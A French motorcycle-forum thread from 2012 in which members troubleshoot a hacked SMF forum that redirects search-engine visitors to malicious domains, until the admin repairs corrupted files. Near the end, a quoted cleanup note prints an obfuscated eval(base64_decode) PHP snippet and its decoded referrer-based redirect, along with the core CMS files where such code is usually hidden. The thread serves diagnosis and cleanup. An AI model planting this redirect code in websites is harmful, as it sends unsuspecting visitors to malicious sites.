Bonjour à tous,
J'au un problème de connexion. Le message -menace : Mal/HTLMGen-A bloque mon accès.
Est-ce que ça ne voudrait pas dire que le site est infecté?
j'ai le même problème si je fais une recherche via gogole et quand je veux accéder au fofo depuis mes mails ...
pareil pour moi je suis oblige d'aller dans mes favoris et sa marche. et avg me dit qu'il a supprimez la menace
C'est marrant sur mac je n'ai rien :sifflet: <D
moi au boulot l'antivirus c'est eset et chez moi avast et même pb
c'est parce que vous êtes des poireaux ? non :-D :-D
:sifflet:
Ben moi j'ai rien (win7, linux ou android).
C est quoi ce truc Oo: j ai rien moi. Vous pouvez m envoyer des copies d ecran pour que je regarde ca de plus pres ;)
-> et vers quelle heure ça vous est arrivé ce truc là?
Oui et partir de quand ?
Dès qu'on les laisse tout seul hein? ben voilà.. y font des :censure: :sifflet:
<D
je dirais depuis hier soir si je me souviens bien
et chez moi mon anti virus bloc
et mnt depuis le boulot il met que je doit être connecté pour accéder au site ...
et ça aussi si je veux un accé via gogole en mettant forum planete kawasaki
ESET Endpoint Antivirus
Accès refusé
Détails :
Page Web :
http://notfound.jkub.com/external/expression-games-affected.php (http://notfound.jkub.com/external/expression-games-affected.php)
Commentaire :
L'accès à la page Web a été bloqué par ESET Endpoint Antivirus. La page Web est sur la liste des sites ayant un contenu potentiellement dangereux
Ouvrir la base de connaissances ESET | www.eset.com (http://www.eset.com)
comme shark depuis hier soir
la même page ou http://404.lflink.com/ (http://404.lflink.com/)
. perso, je n'ai rien eu !
Supprimez vos anti-virus gratuits qui servent à rien et vous aurez plus de problème ... ;)
norton, kapersky , c'est de la :censure: merde !!
je ne suis pas mécontent de l'antivirus de Windows 7
Citation de: Piloux le 13 Octobre 2012 à 14:24:46
je ne suis pas mécontent de l'antivirus de Windows 7
Hein? Windows? un antivirus? euh c'est un paradoxe ou .... <D :sifflet:
Citation de: Piloux le 13 Octobre 2012 à 14:24:46
norton, kapersky , c'est de la :censure: merde !!
je ne suis pas mécontent de l'antivirus de Windows 7
J'suis bien d'accord, mais Avast & co, c'est encore plus inutile ;)
Un message de menace chez moi aussi avec un lien différent que j'ai lu au dessus
http://dubstep.dumb1.com/ (http://dubstep.dumb1.com/)
Microsoft security Essentials
Citation de: Nono94 le 13 Octobre 2012 à 14:33:23
Hein? Windows? un antivirus? euh c'est un paradoxe ou .... <D :sifflet:
Citation de: nErur le 13 Octobre 2012 à 14:40:40
Citation de: Piloux le 13 Octobre 2012 à 14:24:46
norton, kapersky , c'est de la :censure: merde !!
je ne suis pas mécontent de l'antivirus de Windows 7
J'suis bien d'accord, mais Avast & co, c'est encore plus inutile ;)
Avast je l'ai viré aussi !!!
C'est possible d avoir des captures d'écran ??? car la je ne vois rien du tout et de mon coté je n'ai rien :?:
bah pour le moment je suis au taf donc le seul message que j'ai c'est celui que je t'ai marqué sur mon poste précédent
ce soir je te ferais un screen du pb vu de chez moi
(https://forum.planete-kawasaki.com/proxy.php?request=http%3A%2F%2Ffront1.monsterup.com%2Fupload%2F1350133895629.png&hash=7cc56c26a551279706d64f233b5896ab80c4ac05) (http://front1.monsterup.com/upload/1350133895629.png)
avec des maths à côté :P
J'ai cette page dès que je clique sur forum.planete-kawa.com depuis google
(https://forum.planete-kawasaki.com/proxy.php?request=http%3A%2F%2Fimg15.hostingpics.net%2Fpics%2F159755mal.jpg&hash=973548bc012be9bab43edd3df1a664e2c8c2ac2d) (http://www.hostingpics.net/viewer.php?id=159755mal.jpg)
un truc malveillant que vous avez eu!
J'ai la même chose que Clic.
alors peut etre qu'il ""attaque"" FPK ? :'(
on va lui couper les couilles à lui !!
Bonjour à tous,
Le problème qui survient - menace - existe depuis le début du 13/10, juste après minuit.
Voilà le texte qui s'inscrit sur mon écran.
Site Web dangereux bloqué
Emplacement: notfound.jkub.com/external/expression-games-affected.php
L'accès a été bloqué car la menace Mal/HTMLGen-A a été trouvée sur ce site Web.
Retourner à la page précédente.
sophos web protection
Merci de vous pencher sur ce problème préoccupant d'autant que je ne suis pas seul.
A plus
Ah ben bravo, hotCmel tu pirates nos ordinateurs, c'est ça !? Tu crois qu'on te voit pas venir :-D :-D :-D
??? ??? ??? ??? ??? ??? ??? :?: :desole:
ça me fait penser que j'ai pas de protection spécifique web...
juste avira antivir...
donc j'ai pas de pb ... :biggrin: :sifflet:
je repasserai peut etre sous avast du coup ..
pas eu de soucis de mon coté, sous mac os
J ai des pb pour passer de la boite mail au fofo comme les copains!!!
Mais par gogole ça marche
(https://forum.planete-kawasaki.com/proxy.php?request=http%3A%2F%2Fimg11.hostingpics.net%2Fpics%2F26370661m.jpg&hash=90909a66ace5c6f3fdc875bc473d82c4426ecb0f) (http://www.hostingpics.net/viewer.php?id=26370661m.jpg)
JE vais regarder car je vais tester depuis google et effectivement les liens sont HS :'(
Ca va etre compliqué, je n arrive pas trouver pourquoi il fait ca :( je creuse...
Je penses que je devrais couper le serveur d 'ici peu, donc garder le compte via FB :-\
FESSE BOUK?
ben c'est quoi ?
un souci avec google..?
puisque avec les liens dans les marques pages cela ne fait pas de probleme...
peut être devraient ils désactiver leur antivirus et voir si ça recommence ?
JE ne sais pas je cherche encore.... le probleme c est que tout le monde a un antivirus donc les pages sont bloquées
Je penses savoir d ou ca vient mais pour le dépanner je vais bien galerer je vous tiens au courant il restera FB en attendant si il y a des coupures :-\
quand je désactive avast les pages pk ne se charge même plus
tu as d'autres navigateurs ? tu as essayé avec les autres ?
je suis sous seven avec avira je n'ai aucun problème pour ouvrir pk avec l adresse du forum
par contre ça bloque en cliquant sur le lien google d'ou ma conclusion que c'est un problème google et non pas fu forum
si c est bien du forum, car bing et les autres ne fonctionnent pas non plus :-\
Ca sent la reinstallation complete avec quelques pertes de données :'(
Ah non non non :'( :'(
Pourquoi vous tapez dans google aussi, vous avez pas le forum en favori ??? :-D :-D :-D
Citation de: cpg le 14 Octobre 2012 à 13:07:00
je suis sous seven avec avira je n'ai aucun problème pour ouvrir pk avec l adresse du forum
par contre ça bloque en cliquant sur le lien google d'ou ma conclusion que c'est un problème google et non pas fu forum
je vais faire une demo par video... je la fait là...
en favori ca marche tres bien !
bon ca donne une idée, je peux faire ça un peu mieux mais pas en plus net (quoique) c'est un peu flou !
ça marche donc très bien en cliquant sur les favoris
google doit merder comme le dit si bien notre vénéré Hotcmel
gogole me sort xanax aussi au lieu du forum !!
VIDEO ICI (http://youtu.be/ITqb1daNvYk)
j'ai essayé avec un autre navigateur même souci
et moi enfaite c'est que j'accède aux réponse de topic via ma boite mail et donc en cliquant sur le lien du topic cenla ne marche pas
car en effet pour accéder au fofo j'ai un favoris .
ca sent le virus SUR le serveur ca !
Citation de: cpg le 14 Octobre 2012 à 13:07:00
je suis sous seven avec avira je n'ai aucun problème pour ouvrir pk avec l adresse du forum
par contre ça bloque en cliquant sur le lien google d'ou ma conclusion que c'est un problème google et non pas fu forum
idem
Citation de: Dirt Diver le 14 Octobre 2012 à 18:37:55
ca sent le virus SUR le serveur ca !
Quand on clique sur le lien dans google ca renvoit vers differentes pages, a mon avis regarde au niveau des repertoires du fofo ou au pire des fichiers malsains qui auraient pu etre mis.
Citation de: kekenn le 14 Octobre 2012 à 18:39:49
Citation de: cpg le 14 Octobre 2012 à 13:07:00
je suis sous seven avec avira je n'ai aucun problème pour ouvrir pk avec l adresse du forum
par contre ça bloque en cliquant sur le lien google d'ou ma conclusion que c'est un problème google et non pas fu forum
idem
Je pense pas car sur la page de recherche de google quand on pointe la souris sur le lien, dans le navigateur, l'adresse apparait bien (en bas a gauche), alors que la on est redirigé vers ca : http://404.lflink.com/ (http://404.lflink.com/)
la vidéo que j'ai mis je vais la virer ce soir! j'espère que le grand chef l'a vue ?
pareil Dirt meme adresse bidon
Oui je l ai vu et ca me fait pareil :(
bon je la vire
sur iphone par google ca marche tres bien ???!!! Oo:
j ai ressaye sur mon ordi ca marche pas !!
J'ai testé en navigation privé donc sans cook etc. il n'y a pas de soucis de redirection vers le lien.
Donc à mon avis c'est les cook de sessions qui ont du être attaquées
Ca sent le php hack ca
ça arrive sur les smf... c'est libre d'accès tout le monde peu étudier les codes :-\
Citation de: clic le 14 Octobre 2012 à 21:01:14
ça arrive sur les smf... c'est libre d'accès tout le monde peu étudier les codes :-\
Ouai y'a qu'a entrer avec les cookies et après c'est open !
Donc ???
je sais pas comment c'est glandé le serv.
je viderai le cache du serv, matterai les codes en rapport aux sessions et cookies pour voir si ça a pas été touchées et les réparer au besoin, évidemment MDP à changer pour la BDD, l'accès au ftp etc.
à mon humble avis la BDD est intacte donc au pire du pire tu peux save la bdd et réinstaller le forum si le problème persiste.
Je suis pas rester longtemps sur smf et j'étais tombé en plein dans les beta de merde j'avais eu que des soucis donc j'étais un peu violent pour réparer les problèmes que mon fofo avaient. Il y aura sûrement des conseils plus aviser que les miens (yen a qui touche en info sur le fofo je crois).
MDP = mot de passe
BDD = une base de données
smf = j'ai trouvé ça = Société Mycologique de France - Société Météorologique de France -Société mathématique de France :-D :-D
j'ai tout bon? <D
sur iphone ca marchait tres bien par le biais de gogole !!!
Citation de: Piloux le 14 Octobre 2012 à 22:26:39
MDP = mot de passe
BDD = une base de données
smf = j'ai trouvé ça = Société Mycologique de France - Société Météorologique de France -Société mathématique de France :-D :-D
j'ai tout bon? <D
sur iphone ca marchait tres bien par le biais de gogole !!!
Oui mais la première fois que tu t'es connecté avec ton iPhone, t'es arrivé direct à la page du fofo : no problem
si tu t'es identifié normalement et que t'as fait retenir l'id t'as un cookie alors là tu retestes et normalement tu te fais redirigé => problème
si tu t'es identifié normalement sans retenir l'id, t'as un cookie qui existe pendant 60 minutes => problème pendant 60 minutes
si tu t'es pas identifié, pas de cookie => pas de probleme.
SMF = Simple Machine Forum, c'est en fait une communauté de codeur qui code des forums depuis looooongtemps. Tu télécharges sur leurs site : http://www.simplemachines.org/ (http://www.simplemachines.org/) , leur dernière version de forum et puis tu l'héberges sur ton serv. et voilà tu as ton forum =). C'est comme les wordpress et tout les autres CMS existant, plug & play.
je suis identifié sur mon aïephone ;)
en retenant ton pseudo et mdp ?
tu peux aller sur le fofo par google sans que ça te rediriges ?
Citation de: clic le 14 Octobre 2012 à 22:48:27
en retenant ton pseudo et mdp ?
tu peux aller sur le fofo par google sans que ça te rediriges ?
WI :red:
:-D :-D
Une nouvelle preuve qu'un iphone a aucune sécurité web :-D :sifflet: vive apple
Citation de: clic le 14 Octobre 2012 à 23:00:11
Une nouvelle preuve qu'un iphone a aucune sécurité web :-D :sifflet: vive apple
+1 :bravo:
Je pense plus a un script, soit dans le root (ou le repertoire concerné), soit directement dans me fichier "index.php" ou du style.
Mais pas sur !
Je ne pense pas que la bdd soit touchée.
Citation de: Dirt Diver le 14 Octobre 2012 à 23:16:48
Citation de: clic le 14 Octobre 2012 à 23:00:11
Une nouvelle preuve qu'un iphone a aucune sécurité web :-D :sifflet: vive apple
+1 :bravo:
Je pense plus a un script, soit dans le root (ou le repertoire concerné), soit directement dans me fichier "index.php" ou du style.
Mais pas sur !
Je ne pense pas que la bdd soit touchée.
Oui la BDD est intact je pense aussi
Pour index.php j'ai un doute mais bon à voir.
Boss t'as gardé une sauvegarde du fofo sur ton PC une fois tout les ajouts mis sur le forum (thème, etc) ?
Si c'est le cas tu peux comparer le fichier sur le ftp et le fichier sur ton ordi. (avec les travaux en cours c'est cool d'avoir un forum "cassé"... :-\ )
[HS] ft18 vous connaissez ? [FINHS] <D
Citation de: Piloux le 14 Octobre 2012 à 23:31:53
[HS] ft18 vous connaissez ? [FINHS] <D
le char ? XD
nan nan !
Citation de: clic le 14 Octobre 2012 à 23:23:14
Citation de: Dirt Diver le 14 Octobre 2012 à 23:16:48
Citation de: clic le 14 Octobre 2012 à 23:00:11
Une nouvelle preuve qu'un iphone a aucune sécurité web :-D :sifflet: vive apple
+1 :bravo:
Je pense plus a un script, soit dans le root (ou le repertoire concerné), soit directement dans me fichier "index.php" ou du style.
Mais pas sur !
Je ne pense pas que la bdd soit touchée.
Oui la BDD est intact je pense aussi
Pour index.php j'ai un doute mais bon à voir.
Boss t'as gardé une sauvegarde du fofo sur ton PC une fois tout les ajouts mis sur le forum (thème, etc) ?
Si c'est le cas tu peux comparer le fichier sur le ftp et le fichier sur ton ordi. (avec les travaux en cours c'est cool d'avoir un forum "cassé"... :-\ )
ou alors un dossier infecté dans le root qui est linké directement au index.php, car ca apparait quand tu cliques dessus.
Ca ressemble a un spam/pub pour ce site.
J'ai deja eu ca sur mon site de VPC, le hacker avait créé dans le root, un dossier xxzzx et la merde était dedans.
Faut voir l'arborescence.
En même temps sur IPB j'ai connu il fut un temps quand j'avais mon propre forum, mais SMF j'ai jamais poussé à 100%
Citation de: Dirt Diver le 14 Octobre 2012 à 23:39:50
Citation de: clic le 14 Octobre 2012 à 23:23:14
Citation de: Dirt Diver le 14 Octobre 2012 à 23:16:48
Citation de: clic le 14 Octobre 2012 à 23:00:11
Une nouvelle preuve qu'un iphone a aucune sécurité web :-D :sifflet: vive apple
+1 :bravo:
Je pense plus a un script, soit dans le root (ou le repertoire concerné), soit directement dans me fichier "index.php" ou du style.
Mais pas sur !
Je ne pense pas que la bdd soit touchée.
Oui la BDD est intact je pense aussi
Pour index.php j'ai un doute mais bon à voir.
Boss t'as gardé une sauvegarde du fofo sur ton PC une fois tout les ajouts mis sur le forum (thème, etc) ?
Si c'est le cas tu peux comparer le fichier sur le ftp et le fichier sur ton ordi. (avec les travaux en cours c'est cool d'avoir un forum "cassé"... :-\ )
ou alors un dossier infecté dans le root qui est linké directement au index.php, car ca apparait quand tu cliques dessus.
Ca ressemble a un spam/pub pour ce site.
J'ai deja eu ca sur mon site de VPC, le hacker avait créé dans le root, un dossier xxzzx et la merde était dedans.
Faut voir l'arborescence.
En même temps sur IPB j'ai connu il fut un temps quand j'avais mon propre forum, mais SMF j'ai jamais poussé à 100%
C'est pas très fin comme manière de hacker... lol
Bref, faut attendre le boss pour qu'il regarde ça :D
Ouai c'est pas très fin mais c'est la solution que je vois pour que quand on clique sur le lien ca redirige vers un autre site....
Je teste un truc je verrais
Citation de: Dirt Diver le 14 Octobre 2012 à 23:39:50
En même temps sur IPB j'ai connu il fut un temps quand j'avais mon propre forum, mais SMF j'ai jamais poussé à 100%
nan c'est le
PIB pffff 0(0
Citation de: Piloux le 14 Octobre 2012 à 23:48:18
Citation de: Dirt Diver le 14 Octobre 2012 à 23:39:50
En même temps sur IPB j'ai connu il fut un temps quand j'avais mon propre forum, mais SMF j'ai jamais poussé à 100%
nan c'est le PIB pffff 0(0
http://fr.wikipedia.org/wiki/Invision_Power_Board (http://fr.wikipedia.org/wiki/Invision_Power_Board)
A premiere vu mon test a fonctionner pour le site je vais essayer de faire pareil pour le forum mais la c est plus long
Si vous taper planete kawasaki dans google et que vous cliquez sur le lien du site ca doit fonctionner
ça marche ..!! je reessaies sur d'autres navigateurs ...
sur google firefox (pas mis à jour) je tombe sur les recherches
je clik sur "" Accueil - Planete Kawasaki : Site et Forum Kawasaki dédiés à la ...
""
ca marche...
-> si je clik sur ""Forum Kawasaki : ER6n - ER6f ... "
ça indique = http://404.lflink.com/ (http://404.lflink.com/)
ou sur ""Les règles à respecter avant ... """ pareil :(
sur chrome en tapant ->
forum planete kawasaki -> meme erreur
en indiquant planete kawasaki ca marche sur le page de presentation DE google
quand je clik sur les sous titres ERREUR aussi
Oui je sais pour l instant il n y a que le site de reparer, comme je dis plus haut je ferais le forum pares car c est plus long
:pouce: C'est quoi le pb et ta manip ? :-D
J'ai tout reconstruit pour le site
:D Méthode brutal ya que ça de vrai
Ca va etre plus coton pour le forum
bonne continuation
au boulot suis avec nod32... firefox...
je viens sur le fofo par les raccourci firefox (la pré saisie dans la barre d'adresse)
aucun pb.
tinnnnnnnnn cédéem on t'a cherché partout hier ? t'etais où ?
on avait besoin d'un homme fort si la menace menaçait ...
:-D :-D
:sifflet:
J'en ai eu jusqu a 2h du mat pour le site ensuite j attaque le forum ;)
CDM il veut nous attaquer le Chef !!!!!!!!!!! 0(0 0(0
:-D
courage tu vas y arriver ! :sifflet:
Citation de: Piloux le 15 Octobre 2012 à 10:20:29
tinnnnnnnnn cédéem on t'a cherché partout hier ? t'etais où ?
DTCil était trop bô celui la pour que je le laisse passer :-D
Citation de: olivier le 15 Octobre 2012 à 12:43:14
Citation de: Piloux le 15 Octobre 2012 à 10:20:29
tinnnnnnnnn cédéem on t'a cherché partout hier ? t'etais où ?
DTC
il était trop bô celui la pour que je le laisse passer :-D
(https://forum.planete-kawasaki.com/proxy.php?request=http%3A%2F%2Fimg15.hostingpics.net%2Fpics%2F940461cul.jpg&hash=e11d26df1c6ef85964b827921a0eb13012660268) (http://www.hostingpics.net/viewer.php?id=940461cul.jpg)
:-D
j'ai du m'occuper de mon fils de 4 ans qui est à 40 de fievre depuis 3 jours...
je vous raconte pas la nuit ...
:( :-\
si ! si! vas y raconte pour toi !! >:D
bon j'deconne hein? j'espère qu'il se rétablira vite le ch'tio bonhomme !!
merci de rester sur le sujet du topic et d'aller papoter au bar... :sifflet: :-D
Ca se gatte ! Voilà ce que j'obtiens à l'ouverture du forum:
Kaspersky
Internet Security 2011
ACCÈS INTERDIT
L'URL demandée ne peut être affichée
Adresse URL :
http://dubstep.dumb1.com/ (http://dubstep.dumb1.com/)
Bloquée par l'Antivirus Internet
Cause : lien malicieux
Cliquez ici si vous estimez que la page Web n'aurait pas dû être bloquée.
Date de création du message :17:23:25
Dont acte! Je crois qu'il n'y a plus photo, il y a une c. dans le potage!
Sus aux virus
Il a dit qu'il s'en occupait, mais je crois qu'il a le droit de dormir un peu aussi ;)
non non non le boss il dort pas d'aboreuhhh
:-D
Citation de: mistral le 15 Octobre 2012 à 18:28:49
Ca se gatte ! Voilà ce que j'obtiens à l'ouverture du forum:
Kaspersky
Internet Security 2011
ACCÈS INTERDIT
L'URL demandée ne peut être affichée
Adresse URL :
http://dubstep.dumb1.com/ (http://dubstep.dumb1.com/)
Bloquée par l'Antivirus Internet
Cause : lien malicieux
Cliquez ici si vous estimez que la page Web n'aurait pas dû être bloquée.
Date de création du message :17:23:25
Dont acte! Je crois qu'il n'y a plus photo, il y a une c. dans le potage!
Sus aux virus
Ca a toujours été ce message pour les anti virus ;-)
Kaspersky = grausse m*rde
Citation de: nErur le 15 Octobre 2012 à 18:37:08
Il a dit qu'il s'en occupait, mais je crois qu'il a le droit de dormir un peu aussi ;)
Oui cette nuit j'ai été couché à 2h, aujourd hui c'était difficile Oo:
Du coup ce soir dodo tot et j'essaierais de faire ca pour demain soir ;) car la je ne suis pas coucher avec la grsseur du forum :-\
Qu'est ce que tu fais encore la ? Tu n'es pas encore couché ? Allez oustttttt :-D
Citation06/26/2012- Redirects to hinia.zyns.com
This is a referrer based conditional hack. The hack is accomplished using some obfuscated php code. The code will look something like this
ev??al(base??64_decode('DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlY
WRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VS
VkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVN
FUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLC
JNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3Rya
XN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKS
BvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwib
Gl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkc
mVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb
3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlc
mVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubH
kiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbW
F0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZ
WZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiw
kcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc
3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVy
LCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAh
c3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodH
RwOi8vaGluaWEuenlucy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=='));
which de-obfuscates to something like
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0")){if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://hinia.zyns.com/ (http://hinia.zyns.com/)"); exit(); }}} } }
In most cases you will find the code in one of the core CMS files, wp-config.php, wp-settings.php for WordPress or includes/defines.php and includes/index.php on Joomla. On some sites it will be in multiple files including the homepage.
Redirects to dubstep.dumb1.com, minkof.sellclassics.com, www6.uiopqw.jkub.com, www.fdvrerefrr.ezua (http://www.fdvrerefrr.ezua) .com, smooth.ygto.com, costabrava.bee.pl, www.bpoffer.changeip.org (http://www.bpoffer.changeip.org), chromium.my03.com, aozpta.mrbonus.com, www.stlp.4pu.com (http://www.stlp.4pu.com), www.jjuejujj1111.freewww.biz (http://www.jjuejujj1111.freewww.biz) are typically done with obfuscated php code.
Une piste .... ;)
Ok merci le probleme ce n est plus le site mais bien le forum qui pose probleme maintenant ;)
dirt Grand chef va se coucher, alors laisse le dormir nan mais !! :red:
ben j'ai aucun probleme pour l'instant !!!
:-D
:sifflet:
Oui oui piloux je le laisse faire dodo...
Je lui ai mis la piste qui concerne la partie forum et les dossiers/fichiers qu'il peut vérifier.
Une piste pour le chef: regarde la date de modification des fichiers sur le serveur.
Voila réparé ! 0(0 dites moi si vous avez encore des messages d'erreurs ???
Citation de: HotCmel le 17 Octobre 2012 à 21:11:13
Voila réparé ! 0(0 dites moi si vous avez encore des messages d'erreurs ???
Alors c'était quoi ?
Plusieurs fichiers corrompus ;)
J'le savais !
p.... j'suis trop fort ! :sifflet: <D
Normalement si vous faites une recherche dans google tout devrait passer :)
Nickel pour moi ! ;)
Bonjour à tous,
Nickel, ça passe pour moi sans le message d'erreur que j'avais signalé au début.
Bravo HotCmel !
nickel sa remarche sans soucis
:bravo: :bravo: boss
Ok tant mieux ;)
Bravo patron et merci